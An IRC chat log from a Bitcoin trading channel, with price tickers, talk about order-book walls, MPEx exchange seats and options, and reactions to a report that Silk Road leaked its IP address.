sell to him and he sells. Mar 26 16:16:13 nice boiler room reference, did you like it? Mar 26 16:17:00 [MPEX] [S.MPOE] 1250 @ 0.00063515 = 0.7939 BTC [-] Mar 26 16:18:40 Bugpowder: I can see that. At the increase in price, it would be profitable for the last couple of months. Mar 26 16:18:58 slinging BTC.. kids these days! Mar 26 16:21:30 haha deadweasel Mar 26 16:21:40 off yo corner not mines Mar 26 16:22:47 i'd rather just hold. you can sling BTC on my corner KRS1 Mar 26 16:22:58 just no crack/smack Mar 26 16:23:04 brings values down Mar 26 16:23:13 ;;ticker Mar 26 16:23:14 BTCUSD ticker | Best bid: 78.62001, Best ask: 78.70000, Bid-ask spread: 0.07999, Last trade: 78.70000, 24 hour volume: 76425.55033919, 24 hour low: 71.89779, 24 hour high: 79.72001, 24 hour vwap: 75.99540 Mar 26 16:23:43 about the bad news and the crash, im shocked the fork did not do any damage but stall the bulls for a few days, insane... we would need massive bad news to do anything Mar 26 16:24:18 also dont you need a min of 1000 to ahve to get your account aproved? Mar 26 16:24:36 on gox Mar 26 16:24:44 you mean verified? Mar 26 16:24:46 no Mar 26 16:25:00 they do it to everyone now? Mar 26 16:25:11 it was like so since ever Mar 26 16:25:19 ? Mar 26 16:25:37 really? i have or had an anon account on gox Mar 26 16:25:39 Chaang-Noi: I was exceedingly surprised by the fork not causing a lengthy crash Mar 26 16:25:45 crack is cheaper than whole units of BTC these days Mar 26 16:26:10 deadweasel yeah, that is when i knew we were going to double Mar 26 16:26:19 my trading bot account was never veriffied Mar 26 16:26:21 on gox Mar 26 16:26:50 iv not used it in a year so things might have changed, i dont know Mar 26 16:27:04 [BTCTC] [COGNITIVE] 7 @ 0.1429 = 1.0003 BTC [-] Mar 26 16:27:06 also every site i use to get the btc price is down for me... Mar 26 16:27:27 Chaang-Noi: gox would just lag when you really needed it anyhow, better that you don't use it Mar 26 16:27:40 bitcoinity is good Mar 26 16:27:48 iv not used gox since they froce my account Mar 26 16:27:52 froze Mar 26 16:28:02 still have money/btc frozen there? Mar 26 16:28:06 the one that i had verrified Mar 26 16:28:22 the only coin i have left in gox is my 700 btc from bitcoinica they wont let go Mar 26 16:28:45 thats a lot Mar 26 16:28:54 Why not? Mar 26 16:29:07 will they ever release it Mar 26 16:29:23 MJR_ not bad. Mar 26 16:29:33 gox is being silent right now about it, but before too long they will get sued Mar 26 16:29:42 could have done without all the bs libertardism, but anyway Mar 26 16:29:42 i think they are waiting for the case to end in cali first Mar 26 16:30:36 MJR_ i think its my fail internetz :? Mar 26 16:30:38 Does any site show multi-exchange VWAP? Mar 26 16:31:01 yeah Mar 26 16:31:14 If community starts to watch that, maybe people would feel freer to trade more off-Gox Mar 26 16:31:25 community always watched that Mar 26 16:31:43 Is the ticker here pure gox tho? Mar 26 16:31:59 ;;bc,24hprc Mar 26 16:32:05 Error: I tried to send you an empty message. Mar 26 16:32:09 um Mar 26 16:32:16 ;;bc,24hprc Mar 26 16:32:22 Error: I tried to send you an empty message. Mar 26 16:32:25 what da ?! Mar 26 16:32:30 lol, gribble is out of order Mar 26 16:32:36 ;;ticker Mar 26 16:32:36 BTCUSD ticker | Best bid: 79.09000, Best ask: 79.09899, Bid-ask spread: 0.00899, Last trade: 79.09899, 24 hour volume: 76184.89958681, 24 hour low: 71.89779, 24 hour high: 79.72001, 24 hour vwap: 76.01784 Mar 26 16:32:44 bitcoincharts is 502 Mar 26 16:33:03 so it is... Mar 26 16:33:33 http://bitcoincharts.com/markets/currencies/ Mar 26 16:33:40 that is multi exchange vwap Mar 26 16:35:11 mircea_popescu: the mpoe bot seems to not have offers up much more of the time now than a few weeks ago. Is this DDOS related, funding related, other? Mar 26 16:36:12 thx Bugpowder Mar 26 16:36:26 btce price is 73 Mar 26 16:36:30 bitstamp price 82 Mar 26 16:36:34 facepalm Mar 26 16:37:08 Too hard to get USD out of BTCe? Mar 26 16:37:11 couldnt one transfer their btc between markets for big profits Mar 26 16:37:11 wait what? Mar 26 16:37:18 this is typical Mar 26 16:37:22 KRS1: but what to do with the cash Mar 26 16:37:23 btce is always low Mar 26 16:37:28 bitstamp is always high Mar 26 16:37:34 that is true Mar 26 16:37:40 the cash out would give lower btc overall wouldnt it Mar 26 16:37:58 [BTCTC] [PAJKA.BOND] 1 @ 0.10898 BTC [+] Mar 26 16:38:01 [BTCTC] [PAJKA.BOND] 1 @ 0.10899 BTC [+] Mar 26 16:38:15 we are nearing the 15:00 hour Mar 26 16:38:26 prepare for the 80 wall to fall. Mar 26 16:38:33 (hoping) Mar 26 16:38:55 me too Bugpowder Mar 26 16:39:05 kako to get money into btc-e you need to be tight with the russian maffia Mar 26 16:39:19 the main issue is funding options and time Mar 26 16:39:37 also bitstamp is the easiest way to get in money fastest Mar 26 16:39:44 this is very bullish Mar 26 16:39:57 and its also keeping ltc prices down, people buyiong chewap btc Mar 26 16:40:24 virtex now at 82.50/84.20 (CAD)... Canada in the lead Mar 26 16:40:57 BTC on Virtex that is. Not VTX in BTC. Mar 26 16:42:31 whats bitfloor got Mar 26 16:42:36 they are the easiest in my opinion Mar 26 16:43:03 79.87 Mar 26 16:43:25 Slight wall issue from here on Virtex tho: http://bitcoincharts.com/markets/virtexCAD.html Mar 26 16:50:16 yeah Mar 26 16:50:23 still quite a nice wall going on mt gox Mar 26 16:50:30 half a mill before 80 Mar 26 16:50:50 ;;asks 80 Mar 26 16:50:50 There are currently 5417.4674 bitcoins offered at or under 80.0 USD, worth 431701.695968 USD in total. | Data vintage: 30.3969 seconds Mar 26 16:50:59 wall is growing Mar 26 16:51:12 exaggerated...its like 430k Mar 26 16:59:13 Bugpowder its probably observer related. Mar 26 17:00:24 hello Mar 26 17:00:38 https://twitter.com/BitBetsBets/status/316564306453999617 Mar 26 17:00:42 check that out, big money on ltc Mar 26 17:06:41 Bugpowder actually, seems btchcarts has issues with the feed. Mar 26 17:12:26 [BTCTC] [B.YABMC] 1 @ 0.01401 BTC [-] Mar 26 17:16:28 [BTCTC] [B.YABMC] 1 @ 0.01451 BTC [+] Mar 26 17:19:21 that 12000 BTC wall bastard is back Mar 26 17:20:09 where my bidders back Mar 26 17:27:11 [HAVELOCK] [SDICE] 4 @ 0.4600001 = 1.84 BTC [+] Mar 26 17:27:11 [HAVELOCK] [SDICE] 26 @ 0.46 = 11.96 BTC [-] Mar 26 17:27:38 crash:) Mar 26 17:28:22 ;;ticker Mar 26 17:28:23 BTCUSD ticker | Best bid: 75.34000, Best ask: 77.00000, Bid-ask spread: 1.66000, Last trade: 75.34000, 24 hour volume: 67052.57610028, 24 hour low: 71.89779, 24 hour high: 79.72001, 24 hour vwap: 76.21349 Mar 26 17:28:39 ;;asks 80.0 Mar 26 17:28:39 There are currently 18683.032 bitcoins offered at or under 80.0 USD, worth 1474040.53264 USD in total. | Data vintage: 19.2638 seconds Mar 26 17:28:56 lol 12000 btc ask wall Mar 26 17:29:27 its fake Mar 26 17:29:44 the bears vs the bulls Mar 26 17:33:30 10:24 <+gribble> New rating | Supa > -10 > smickles | None Mar 26 17:33:31 lol Mar 26 17:33:41 fucking four minutes lag Mar 26 17:33:42 congrats Mar 26 17:33:46 ;;goxlag Mar 26 17:33:46 334.762829 seconds Mar 26 17:33:50 bullshit Mar 26 17:34:21 we had another run at 80 eh? Mar 26 17:35:34      Chaang-Noi: what do you mean it's fake? total newb here Mar 26 17:36:11 [HAVELOCK] [HIM] 2 @ 1.75 = 3.5 BTC [+] Mar 26 17:38:54 there is no such thing as a fake wall Mar 26 17:39:05 how many times do we have to go over this Mar 26 17:39:22 It is a wall designed to push prices down thouh Mar 26 17:39:37 the wall is real, the intention just isn't what you think ZedsterX Mar 26 17:39:57 earlier today when it was put up, it was at 80.0001 Mar 26 17:40:31 If he really wanted to sell, he would try to undercut the asks at 80, instead posting just above it Mar 26 17:41:24 Just someone trying to mainpulate the market, perhaps doing some day trading, scooping up at 75.5 on the dip, then reselling higher when he removes the wall Mar 26 17:41:41 the risk for him is that someone might just have the capital to buy the whole thing in one shot. Mar 26 17:44:06 not that selling 12000 BTC at 77.5 would be considered a bad outcome for most people :-P Mar 26 17:46:02 HEY! XRP is now listed on http://bitcoincharts.com/markets/currencies/ Mar 26 17:46:08 looks like the value is really tanking Mar 26 17:46:16 thanks for the clarification....i am just now reading day Trading for Dummies so I am currently a Dummies but learning Mar 26 17:46:53 30dvwap is 48000 for xrp, but 1day is 71000 Mar 26 17:47:24 yeah, the fact he is manipulating i think means the price is being held lower Mar 26 17:47:26 ZedsterX: of course we don't really know what is in the mind of that trader, but that's what it appears to be. Mar 26 17:47:27 buy buy buy Mar 26 17:47:46 i get it Bug thanks Mar 26 17:47:54 This is typically a very active time of day though, that wall is really temping someone I bet... Mar 26 17:48:15 ok that confuses me Mar 26 17:48:30 but i am reading as we speak Mar 26 17:48:44 no need to elaborate just yet....lemme learn a bit more Mar 26 17:49:51 i bet he cancels once someone really starts to eat into it Mar 26 17:49:59 let loose the dogs of war Mar 26 17:50:10 MUHUhahah Mar 26 17:50:13 :) Mar 26 17:50:35 yah, but you can't cancel it in time if someone eats it all in one go. Mar 26 17:50:45 [BTCTC] [PAJKA.BOND] 1 @ 0.1088 BTC [-] Mar 26 17:50:59 time for lunch.... hopefully we will be >80 when I get back. Mar 26 17:51:05 Okay with The Wall and The Dogs Of War, time to turn on the Pink Floyd Mar 26 17:51:20 ;;bids 0 Mar 26 17:51:23 There are currently 36671413 bitcoins demanded at or over 0.0 USD, worth 9038379.57806 USD in total. | Data vintage: 0.0189 seconds Mar 26 17:51:26 why "manipulating" ? Mar 26 17:51:32 why can't it just be some dude who wants to sell at that price. Mar 26 17:52:08 mp, can you process my deposit. thanks Mar 26 17:52:18 mircea_popescu: because people love a story Mar 26 17:53:32 jborkl done Diablo-D3 heh i guess so Mar 26 17:53:38 Thank mp Mar 26 17:53:52 http://www.reddit.com/r/SilkRoad/comments/1b1lvy/warning_the_silk_road_revealed_its_public_ip_last/ Mar 26 17:54:09 OH SHIT Mar 26 17:54:12 SERIOUSLY? Mar 26 17:54:42 aaahahahaah Mar 26 17:54:52 PWNED Mar 26 17:55:08 well, if that get shut down not exactly good for btc Mar 26 17:55:22 so this means in fact sr is either a honeypot or else has been under law enforcement scrutiny for months Mar 26 17:55:36 because don't tell me they didn't know. Mar 26 17:55:50 dude Mar 26 17:56:00 Ive been saying its a honeypot since the day 1 Mar 26 17:56:13 Once the server is seized, it can either be taken offline and analyzed for evidence right then and there, or left online and modified to better accrue evidence. In the case of SR, leaving the server online and modifying the purchase mechanism to not encrypt addresses on the server would be the obvious choice. Law enforcement would immediately have access to all addresses, private messages, etc. Mar 26 17:56:18 ^^ Mar 26 17:57:15 Lot of assumptions there. Mar 26 17:57:37 [BTCTC] [PAJKA.BOND] 1 @ 0.10899 BTC [+] Mar 26 17:57:40 the public ip could be a fake ip Mar 26 17:58:07 yes Mar 26 17:58:11 It assumes law enforcement also noticed this. Mar 26 17:58:16 or they could just be in a jurisdiction that gives two shits Mar 26 17:58:50 i hope to god it is in n korea Mar 26 17:59:56 think new zealand could be good enough Mar 26 18:00:41 mircea_popescu: not exactly "manipulating" but anyone who puts an order that large out there is probably not trying to just sell or buy, they would layer it and break it up so that it wasn't obviuos Mar 26 18:00:46 so this takes out sr. Mar 26 18:00:51 mpex is LITERALLY the one left. Mar 26 18:00:55 dun dun dun Mar 26 18:00:56 um, change IPs? Mar 26 18:01:03 or iSP Mar 26 18:01:22 bit4x hasn't been hacked Mar 26 18:01:29 MJR_ why shouldn't it be obvious ? Mar 26 18:01:35 [BTCTC] [S.MPOE-PT] 269 @ 0.000711 = 0.1913 BTC [+] Mar 26 18:01:38 [BTCTC] [S.MPOE-PT] 131 @ 0.000711 = 0.0931 BTC [+] Mar 26 18:01:41 [BTCTC] [S.MPOE-PT] 60 @ 0.000712 = 0.0427 BTC [+] Mar 26 18:01:44 [BTCTC] [S.MPOE-PT] 680 @ 0.000713 = 0.4848 BTC [+] Mar 26 18:01:46 [BTCTC] [S.MPOE-PT] 1820 @ 0.000713 = 1.2977 BTC [+] Mar 26 18:02:47 [BTCTC] [PAJKA.BOND] 9 @ 0.10899 = 0.9809 BTC [+] Mar 26 18:05:42 [BTCTC] [COGNITIVE] 1 @ 0.144 BTC [+] Mar 26 18:06:06 < mircea_popescu> so this means in fact sr is either a honeypot or else has been under law enforcement scrutiny for months <<< probably since that initial address change Mar 26 18:06:32 never even visited it Mar 26 18:07:17 i did a few times, but there wasn't ever anything worth buying Mar 26 18:08:53 porn an laserpointers Mar 26 18:08:54 wall gone right? Mar 26 18:09:36 the 80.01 one? Mar 26 18:10:01 no the 12000 at 77.5 Mar 26 18:10:06 taken down or eaten? Mar 26 18:10:30 i guess taken down, hmm Mar 26 18:10:37 I'd say taken down as well Mar 26 18:10:57 if only i had a million on gox :) Mar 26 18:11:00 there wasn't that much volume recently, so taken down Mar 26 18:11:09 and backto 78 Mar 26 18:11:19 yeah vol is how i checked too Mar 26 18:12:01 o.btc Mar 26 18:13:06 $vwap oix Mar 26 18:13:07 smickles: ^OIX 1 day: no data 7 day: average: 71.99677481 high: 78.31645607 low: 48.45538965 volume: 50180 btc: 4750.25972448 30 day: no data Mar 26 18:13:37 78.5 Mar 26 18:14:03 !ticker Mar 26 18:14:03 Hell, ain't we about more fucked than a whore at closin' time, huh? Mar 26 18:14:06 ;;ticker Mar 26 18:14:06 BTCUSD ticker | Best bid: 78.00000, Best ask: 78.40000, Bid-ask spread: 0.40000, Last trade: 78.00000, 24 hour volume: 68609.09897307, 24 hour low: 71.89779, 24 hour high: 79.72001, 24 hour vwap: 76.15356 Mar 26 18:14:12 OH COME ON Mar 26 18:14:16 GO TO INFINITY ALREADY Mar 26 18:14:19 Mar 26 18:16:53 [BTCTC] [ASICMINER-PT] 1 @ 0.74998 BTC [+] Mar 26 18:17:32 79 Mar 26 18:18:13 [BTCTC] [S.DICE-PT] 14 @ 0.00499 = 0.0699 BTC [+] Mar 26 18:18:16 i see one share trade and im like wtf... then i remember that share is $50 Mar 26 18:18:26 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1304 BTC [-] Mar 26 18:25:47 diablo are you expecting it to go up or something Mar 26 18:26:04 this is looking plateau-ish, isnt it? Mar 26 18:26:22 just curious, im no expert or anything Mar 26 18:26:45 i did a few times, but there wasn't ever anything worth buying <<< i kept saying it's irrelevant but NO!!! DRUGS!!! SR BIGGER THAN MPEx!!!1 Mar 26 18:27:07 KRS1: Im expecting it to go up, actually Mar 26 18:27:48 that would be nice...im trying to buy more, but on a dip at some point Mar 26 18:28:09 mircea_popescu: remember when sr was down for 2 weeks, and it had no impact on bitcoin? Mar 26 18:28:19 yes. Mar 26 18:28:25 one of the reasons i was saying that. Mar 26 18:28:26 quick question, and don't laugh Mar 26 18:28:38 does coinbase have trouble when you SELL bitcoins on their site? Mar 26 18:28:45 or is it pretty much only on the buy side Mar 26 18:29:08 smickles: was that when they got sql attacked or wahtever? Mar 26 18:29:32 I used to think SR impact was large, I'd like to go look at the data for that period. Mar 26 18:29:41 deadweasel: I don't think so. I believe they were idiopathicly offline Mar 26 18:30:28 remember when it was? Mar 26 18:30:44 and you probably used the think it was large because the media and all the people who didn't thake the time to research the topic kept saying it was 3/4 of the bitcoin economy Mar 26 18:30:55 It was in november iirc Mar 26 18:31:16 all the media = reditards Mar 26 18:31:20 what media. Mar 26 18:31:36 mircea_popescu's blog has an article written at the time, which documents the date Mar 26 18:31:43 smickles: i think that's why I thought so too. i have some reditard in me, that much is obvious. Mar 26 18:31:51 lol Mar 26 18:31:57 mircea_popescu: what media? news publications and blogs Mar 26 18:32:03 yeah yeah Mar 26 18:32:08 deformedia. Mar 26 18:32:59 I would like to find out how many SR users become bitcoin adopters. or if most of them just OD. Mar 26 18:33:04 the news people were especially on about the relative size of sr when that senator was bitching about bitcoin Mar 26 18:33:38 but i'll never know Mar 26 18:33:39 well, i don't think too many drug users od... Mar 26 18:34:11 lethal ods are really about as frequent as septicemia Mar 26 18:34:18 od figures are very low considering the number of users..dont ask me how i know guess i came across stats on that one day Mar 26 18:34:45 especially since most drug users are either smokers or drinkers. but if we set that aside, most drug users are probably using pot, which takes thousands of pounds to od in Mar 26 18:34:49 s/in/on/ Mar 26 18:35:17 ok, the more important part is how many of the SR users turn to BTC as a whole, whether it be speculation, assets, whatever. Mar 26 18:35:32 ;;goxlag Mar 26 18:35:32 0 seconds Mar 26 18:35:36 or do you think most pick up some BTC, get their stash, and do it again in a few weeks.... never realizing the power of BTC Mar 26 18:35:47 deadweasel i don't think many really. Mar 26 18:36:07 I'd bet it's a foot in the door. they may not start using BTC regularly right away, but it's psycologically addictive Mar 26 18:36:25 don't i know it! Mar 26 18:36:30 :D Mar 26 18:36:56 like all the peeps who heard about bitcoin on 'Security Now' and ran a client for fun Mar 26 18:37:09 [BTCTC] [S.DICE-PT] 11 @ 0.00499 = 0.0549 BTC [+] Mar 26 18:37:13 then some months later btc was up to 30, and they took interest Mar 26 18:39:05 [MPEX] [S.MPOE] 800 @ 0.0006361 = 0.5089 BTC [+] Mar 26 18:39:07 [MPEX] [S.MPOE] 2850 @ 0.00064816 = 1.8473 BTC [+] Mar 26 18:44:11 [HAVELOCK] [SDICE] 1 @ 0.465 BTC [+] Mar 26 18:45:53 ;;calc 31/(1-.6633) Mar 26 18:45:54 92.0700920701 Mar 26 18:46:03 nice Mar 26 18:50:39 ;;calc 1/(1-.09251) Mar 26 18:50:39 1.10194051725 Mar 26 18:50:49 ;;calc 75/(1-.09251) Mar 26 18:50:49 82.6455387938 Mar 26 18:54:24 [MPEX] [O.BTCUSD.C750T] 1 @ 0.07264594 BTC [+] Mar 26 18:54:36 [MPEX] [O.BTCUSD.C730T] 1 @ 0.08527257 BTC [+] Mar 26 18:54:42 [MPEX] [S.DICE] 800 @ 0.00425029 = 3.4002 BTC [-] Mar 26 18:56:37 ;;calc 75/(1-.07264) Mar 26 18:56:37 80.8747412008 Mar 26 18:58:11 [HAVELOCK] [SDICE] 1 @ 0.46 BTC [-] Mar 26 19:00:11 [HAVELOCK] [VTX] 3 @ 0.73925 = 2.2178 BTC [-] Mar 26 19:01:16 "MPEx just sponsored hosting for bitcoinity. Definitely check it out!" Mar 26 19:01:22 noice Mar 26 19:01:44 [BTCTC] [PAJKA.BOND] 2 @ 0.10899 = 0.218 BTC [+] Mar 26 19:02:00 really? Bugpowder: was that one of those popup messages? Mar 26 19:02:19 ooooh, mircea_popescu you sly dog Mar 26 19:02:38 lol, link to dark themed mpex Mar 26 19:04:05 nice Mar 26 19:04:56 yeah, it popped up on bitcoinity Mar 26 19:05:49 bring back the coffee theme! Mar 26 19:06:03 lol seems coinbr.live needs dark skin too nao Mar 26 19:07:30 [BTCTC] [PAJKA.BOND] 1 @ 0.10898 BTC [-] Mar 26 19:08:18 [BTCTC] [PAJKA.BOND] 1 @ 0.09 BTC [-] Mar 26 19:09:05 haha i see ppl use bitcoinity Mar 26 19:14:14 [BTCTC] [BASIC-MINING] 1 @ 0.34999 BTC [+] Mar 26 19:17:17 [BTCTC] [GSDPT] 10 @ 0.004587 = 0.0459 BTC [+] Mar 26 19:17:51 [BTCTC] [GSDPT] 10 @ 0.00459 = 0.0459 BTC [+] Mar 26 19:18:27 [BTCTC] [GSDPT] 1 @ 0.00459 BTC [+] Mar 26 19:21:20 actually i would say jurov;s truck looks even better in dark faq Mar 26 19:21:27 http://courtroom-joke.pen.io/ Mar 26 19:22:28 lol Mar 26 19:22:57 heh Mar 26 19:23:16 [BTCTC] [ASICMINER-PT] 1 @ 0.74998 BTC [+] Mar 26 19:23:18 [BTCTC] [ASICMINER-PT] 1 @ 0.74999 BTC [+] Mar 26 19:33:11 good news everyone Mar 26 19:33:16 we are all gonna get laid!!!! Mar 26 19:33:26 thanks to popesci Mar 26 19:33:30 popescu* Mar 26 19:33:38 um, i'm already getting laid Mar 26 19:33:47 but thanks! Mar 26 19:34:02 thestrin1puller: why? Mar 26 19:38:44 also, if you get romanian nymphos, use protection :) Mar 26 19:39:18 ;;ticker Mar 26 19:39:18 BTCUSD ticker | Best bid: 78.01004, Best ask: 78.50001, Bid-ask spread: 0.48997, Last trade: 78.50001, 24 hour volume: 59775.07560411, 24 hour low: 72.60000, 24 hour high: 79.72001, 24 hour vwap: 76.48701 Mar 26 19:40:48 wait. wut ? Mar 26 19:41:11 ;;eauth mircea_popescu Mar 26 19:41:12 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 26 19:41:46 ;;everify freenode:#bitcoin-otc:5d85a0d3d71fae1ea046dbcce6669c5252d0c741731614e7736ad361 Mar 26 19:41:48 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 26 19:42:04 ;;rate comboy 1 He's the Bitcoinity guy. Mar 26 19:42:15 Rating entry successful. Your rating of 1 for user comboy has been recorded. Mar 26 19:42:46 mircea_popescu: do you still sell accounts for 30 btc? =) Mar 26 19:43:47 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Mar 26 19:43:47 cylta yeah, reg fee is 30 btc. Mar 26 19:44:01 happily the exchange rate is doing the work for me so i don't have to raise it. Mar 26 19:44:11 it's 2.3k $ Mar 26 19:44:49 kinda cheap huh. Mar 26 19:44:50 I'm a noob at this stuff, even after working with and mining BTC for almost 2 yrs now, can someone answer a question about OTC for me? Mar 26 19:45:01 yes KRS1. also, don't ask to ask. jsut ask. Mar 26 19:45:06 KRS1: sure, just ask it Mar 26 19:45:16 askwall at 75 now Mar 26 19:45:24 ;;asks 75 Mar 26 19:45:25 mircea_popescu: what is the total value of all asstes on mpex? Mar 26 19:45:26 There are currently 0 bitcoins offered at or under 75.0 USD, worth 0.0 USD in total. | Data vintage: 0.0014 seconds Mar 26 19:45:37 cylta like 1.3mn btc. Mar 26 19:45:43 Bugpowder: mtgox x5 7.3039 @ 78.92499262 USD Mar 26 19:45:50 ok sorry bout that..so I 4000 btc for sale at 77.756 each on otc..I can buy from this guy at a discount (compared to current M.P.)? Mar 26 19:45:58 why would he want to sell at that price? Mar 26 19:46:24 KRS1: he will not able to sell all amount because of low liquidity on market Mar 26 19:46:24 ;;bids 75 Mar 26 19:46:24 There are currently 8953.862 bitcoins demanded at or over 75.0 USD, worth 678866.343559 USD in total. | Data vintage: 58.5529 seconds Mar 26 19:46:50 cylta: feel free to use my fingerprint for a 5BTC discount on the signup fee :) Mar 26 19:46:56 KRS1: so, it's profitable for him to sell just a bit below, because it will be more than he will get if he will sell at market price... market price is limited to 10 btc aprx. Mar 26 19:47:12 [HAVELOCK] [SDICE] 3 @ 0.46 = 1.38 BTC [-] Mar 26 19:47:17 oh i see..buys are a bit low in demand so he's trying to discount them to get rid of em at a good price without bringing market price down Mar 26 19:47:23 Bugpowder: hehe =) I don't think that I will ever be so self confident, that I will able to make more than 2.3k$ on trading. Mar 26 19:47:37 KRS1: right Mar 26 19:47:37 thanks! Mar 26 19:47:50 KRS1: but buying such amount now... it's very risky. Mar 26 19:47:55 you won a seat on the MPEX echange , which has inherent value Mar 26 19:47:56 funny biz ya'll are in. Mar 26 19:48:01 own Mar 26 19:48:03 not won Mar 26 19:48:12 [HAVELOCK] [SDICE] 5 @ 0.4531 = 2.2655 BTC [-] Mar 26 19:48:18 love what you are doing here mp Mar 26 19:48:28 ;) Mar 26 19:48:31 jborkl: as I know, you can't sell it Mar 26 19:48:37 why not Mar 26 19:48:42 sell your private key Mar 26 19:48:47 jborkl: I mean whole account, so it does not cost it any more Mar 26 19:48:56 yes you could Mar 26 19:49:00 [MPEX] [S.DICE] 1000 @ 0.00449999 = 4.5 BTC [+] Mar 26 19:49:15 mp goes by key , not by name Mar 26 19:49:22 I must say, buying a seat on MPEX was the second best decision I made in bitcoinlyfe Mar 26 19:49:50 Bugpowder_: did you earn enough to pay back for it price? Mar 26 19:49:58 ahaha Mar 26 19:50:01 time for the ponzigraph ? Mar 26 19:50:07 I am up about 200BTC today alone Mar 26 19:50:10 He owns a seat on the exchange, which has appreciated in value Mar 26 19:50:12 [HAVELOCK] [SDICE] 1 @ 0.453 BTC [-] Mar 26 19:50:25 so yes Mar 26 19:50:33 Bugpowder_: what are you doing? just buying low selling high? Mar 26 19:50:37 options Mar 26 19:50:46 ;;ticker Mar 26 19:50:47 BTCUSD ticker | Best bid: 77.49000, Best ask: 77.80434, Bid-ask spread: 0.31434, Last trade: 77.80434, 24 hour volume: 60634.32567194, 24 hour low: 72.60000, 24 hour high: 79.72001, 24 hour vwap: 76.51197 Mar 26 19:50:49 I also have traded all the securities Mar 26 19:50:52 Bugpowder_: selling or buying? Mar 26 19:50:57 I have done it all Mar 26 19:51:14 futures, diff futures, the CDO offering, the S.BBET IPO Mar 26 19:51:27 Bugpowder_: okay, does it mean that other people at mpex loose 200btc? Mar 26 19:51:48 Not necessarily. If the value of a security goes up, then everyone wins Mar 26 19:52:01 for options, those are zero sum Mar 26 19:52:09 [MPEX] [S.DICE] 1000 @ 0.00449999 = 4.5 BTC [+] Mar 26 19:52:09 the MPOE bond holders pay Mar 26 19:52:34 but MPOE has averaged 12% return on equity per month Mar 26 19:52:38 since inception Mar 26 19:53:02 Bugpowder_: okay. probably i'm just too stupid to understand all this things... Mar 26 19:53:10 same.. Mar 26 19:53:13 All in, the MPEX account fee is probably <1% of total personal profits so far. Mar 26 19:53:19 drat. my daughter found out how to have the printer give a test page Mar 26 19:53:39 I bet its safe to say bugpowder has lost a coin or two as he was learning.. Mar 26 19:53:52 I've lost hundreds in a few hours Mar 26 19:54:01 i suspect Bugpowder_ is ahead overall Mar 26 19:54:03 buying puts on a dip Mar 26 19:54:04 which is easy with options? Mar 26 19:54:23 cylta, there's also coinbr.com, almost as good as having mpex acct directly Mar 26 19:54:32 But in the S.BBET IPO, I flipped about 200BTC into 400BTC in about 20 minutes. Mar 26 19:54:44 i'll vouch for coinbr, it's a good service Mar 26 19:54:47 that ipo was wild. Mar 26 19:54:50 wow.. Mar 26 19:54:52 cylta, if you have <500BTC to invest, I'd stick to coiner. Mar 26 19:54:58 coinbr Mar 26 19:55:01 jurov: thanks, I already was there but they offering limited usability afaik Mar 26 19:55:26 coiner, lol. that sounds like a bad word Mar 26 19:55:46 yea but wwe can do anything that doesn't have the interface there manually on request Mar 26 19:55:59 mircea_popescu, you're just one of those *coiners*. go back in your hole Mar 26 19:56:05 bugpowder- thanks sounds like sound advic Mar 26 19:56:10 cylta, or is the prob somewhere else? Mar 26 20:04:11 [HAVELOCK] [VTX] 7 @ 0.73924998 = 5.1747 BTC [-] Mar 26 20:10:12 [HAVELOCK] [SDICE] 1 @ 0.453 BTC [-] Mar 26 20:28:10 what does an exchange seat do Bugpowder_ Mar 26 20:28:13 and how much is it Mar 26 20:29:00 you can trade directly on MPEx Mar 26 20:29:03 It's 30BTC. Mar 26 20:29:08 or 25BTC with referral Mar 26 20:29:21 otherwise, use coinbr Mar 26 20:29:50 I should get paid for this PR job I'm doing here. Mar 26 20:32:40 :) Mar 26 20:33:21 Bugpowder_: you can. just get a coinbr affiliate link :) Mar 26 20:34:03 ah! Mar 26 20:34:27 option depth is really non existant Mar 26 20:34:38 wait a minute Mar 26 20:34:42 bot is updating Mar 26 20:34:55 depth is basically unlimited Mar 26 20:35:02 if you are willing to pay the premium Mar 26 20:36:37 prolly should read that book on options Mar 26 20:36:42 but sounds interesting Mar 26 20:36:57 what is with mpoebot recently, i've been noticing more time when it's not offering Mar 26 20:37:05 mpex really could use a facelift Mar 26 20:37:22 doesnt really work on prmoting itself either! Mar 26 20:37:22 taub: consider that that website is not mpex Mar 26 20:37:35 taub, have you seen dark version? http://mpex.co/?r=1 Mar 26 20:37:46 that's as much facelift as we'll ever get Mar 26 20:37:51 black as my soul :) Mar 26 20:37:53 mpex is the exchange, it's not like the nyse tradefloor has a web portal Mar 26 20:37:53 haha ok Mar 26 20:38:32 MPEX could not be easier to use, once you learn how to use it Mar 26 20:38:33 but i guess, if someone creates nifty css for it, i can serve it on mpex.coinbr.com Mar 26 20:38:49 I liked the coffee theme with the rounded edges. Mar 26 20:39:08 taub, mpoe bot has been flaky the last few days Mar 26 20:39:10 not sure why Mar 26 20:39:25 if you wait around for 15 minutes, bid and asks will probably show up Mar 26 20:39:34 1000 contracts at each strike Mar 26 20:39:37 overloaded by the volatility, its model converges slowly? Mar 26 20:40:13 maybe? frankly I'm surprised its not out of captial Mar 26 20:40:17 400,000 contracts Mar 26 20:40:19 traded Mar 26 20:40:30 probably strong skew to long BTC Mar 26 20:40:30 or the slave girls can't keep up :) Mar 26 20:40:50 well, it's capital is mpbor + mircea's wallet Mar 26 20:41:05 is it still? Mar 26 20:41:11 I thought its just mpbor now Mar 26 20:41:16 yeah, he's 'lender of last resort' Mar 26 20:41:19 still? Mar 26 20:41:26 i didn't think it changed Mar 26 20:41:34 it didn't happen so often recently, but he's still there Mar 26 20:41:45 maybe he needs to add funds Mar 26 20:42:04 well buy my offerings if mpoebot isn't there Mar 26 20:42:41 anyway seems it arrived Mar 26 20:42:42 taub Bot is back, check now Mar 26 20:43:40 got my new laptop-bought-with-bitcoins Mar 26 20:43:52 named it "Lappy9001" Mar 26 20:43:55 congrats! from where? Mar 26 20:44:09 I'm still waiting on a shipment for over 2 weeks from bitcoinstore.com Mar 26 20:44:10 Bugpowder_: bitcoinstore Mar 26 20:44:19 I think something got fucked up Mar 26 20:44:26 was it on backorder? Mar 26 20:45:30 [MPEX] [O.BTCUSD.C310T] 2 @ 0.60574691 = 1.2115 BTC [+] Mar 26 20:46:00 ^ selling a bit of my stash every day Mar 26 20:46:10 ;;calc 31/(1-.6057) Mar 26 20:46:10 78.6203398428 Mar 26 